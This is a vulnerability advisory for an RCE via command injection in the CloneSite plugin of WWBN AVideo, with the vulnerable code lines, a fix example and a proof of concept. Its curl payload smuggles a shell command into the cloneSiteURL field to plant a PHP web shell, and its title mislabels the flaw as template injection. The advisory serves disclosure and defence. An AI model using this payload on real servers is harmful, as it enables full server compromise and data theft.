Server side template injection in wwbn/avideo
Description
WWBN AVideo: RCE caused by the CloneSite plugin
Summary
The cloneServer.json.php endpoint in the CloneSite plugin constructs shell commands using user-controlled input (url parameter) without proper sanitization. The input is directly concatenated into a wget command executed via exec(), allowing command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., ;). This leads to Remote Code Execution (RCE) on the server.
Details
Inside plugin/CloneSite/cloneClient.json.php (line 112) the URL is not properly sanitized:

```php
// plugin/CloneSite/cloneClient.json.php, line 112
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));
```

The str_replace strips the single quotes that escapeshellarg added, which undoes the escaping entirely, so an attacker can supply a malicious cloneSiteURL that reaches the shell and leads to RCE:

```php
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; // line 116
$cmd = "wget -O {$sqlFile} {$sqlURL}";                                // line 117
exec($cmd . " 2>&1", $output, $return_val);                           // line 119
```
The attack flow

1. Set up a malicious site that serves the clone data.
2. Add the malicious URL via objects/pluginAddDataObject.json.php.
3. Access plugin/CloneSite/cloneClient.json.php to trigger the RCE.
PoC

Create a malicious site with Python, for example:

```python
from flask import Flask, jsonify, request app = Flask(__name__) @app.route('/', defaults={'path': ''}) @app.route('/<path:path>') def catch_all(path): print("PATH:", path)...
```

Change the URL to a payload like the following (requires an admin session):

```shell
curl -b 'PHPSESSID=<admin_session>' -X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \ -H "Content-Type: application/json" \ -d '{ "cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[1])?>\"${IFS}>1.php;/", "cloneSiteSSHIP":"127.0.0.1", "cloneSiteSSHUser":"1", "cloneSiteSSHPort":"22",...
```

This payload creates a web shell.

Then access plugin/CloneSite/cloneClient.json.php.

1.php will be created.
Impact
Remote Code Execution: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.
Full server compromise: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.
Recommended Fix
Apply stronger sanitization to $objClone->cloneSiteURL; in particular, the str_replace that strips the quotes added by escapeshellarg defeats the escaping and must not be used.
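The quote-stripping pattern from line 112 beside a hardened way to build the same wget command, as an added example that is not AVideo's own code; the function names, the .sql file-name rule and the sample inputs are assumptions made for the illustration.

```php
<?php
// Added example, not AVideo's own code. Contrasts the vulnerable pattern from
// the advisory with a hardened version of the same command construction.

// Vulnerable: escapeshellarg() wraps the URL in single quotes, str_replace()
// then removes them, so the value reaches the shell unquoted.
function buildCmdVulnerable(string $cloneSiteURL, string $sqlFile): string
{
    $cloneSiteURL = str_replace("'", '', escapeshellarg($cloneSiteURL));
    $sqlURL = "{$cloneSiteURL}videos/clones/{$sqlFile}";
    return "wget -O {$sqlFile} {$sqlURL}";
}

// Hardened: validate scheme and URL shape, constrain the file name, and pass
// every shell argument through escapeshellarg() with its quotes left intact.
function buildCmdHardened(string $cloneSiteURL, string $sqlFile): ?string
{
    $cloneSiteURL = rtrim($cloneSiteURL, '/') . '/';
    if (filter_var($cloneSiteURL, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($cloneSiteURL, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    // Assumption: clone dumps are plain file names such as "clone_1.sql".
    if (!preg_match('/^[A-Za-z0-9_.-]+\.sql$/', $sqlFile)) {
        return null;
    }
    $sqlURL = $cloneSiteURL . 'videos/clones/' . $sqlFile;
    // Each argument is one single-quoted token; ';', '$' and '"' inside the
    // URL are data to wget, not syntax to the shell.
    return 'wget -O ' . escapeshellarg($sqlFile) . ' ' . escapeshellarg($sqlURL);
}

// Constructed inputs: a benign clone source and one carrying a shell
// metacharacter, the shape of the URL used in the advisory.
$benign  = 'http://127.0.0.1:8071/';
$hostile = 'http://127.0.0.1:8071/;id;/';

echo buildCmdVulnerable($hostile, 'clone.sql'), PHP_EOL; // ';' ends the wget command
echo buildCmdHardened($benign, 'clone.sql'), PHP_EOL;    // every argument quoted
// Either null (rejected by validation) or one quoted token; never a second command.
var_dump(buildCmdHardened($hostile, 'clone.sql'));
```

Fetching the dump with PHP's curl extension instead of exec() removes the shell from the path altogether; the functions above only show the minimal fix to the pattern the advisory describes.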
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
| Ecosystem | Package | Affected version |
|---|---|---|
| packagist | | |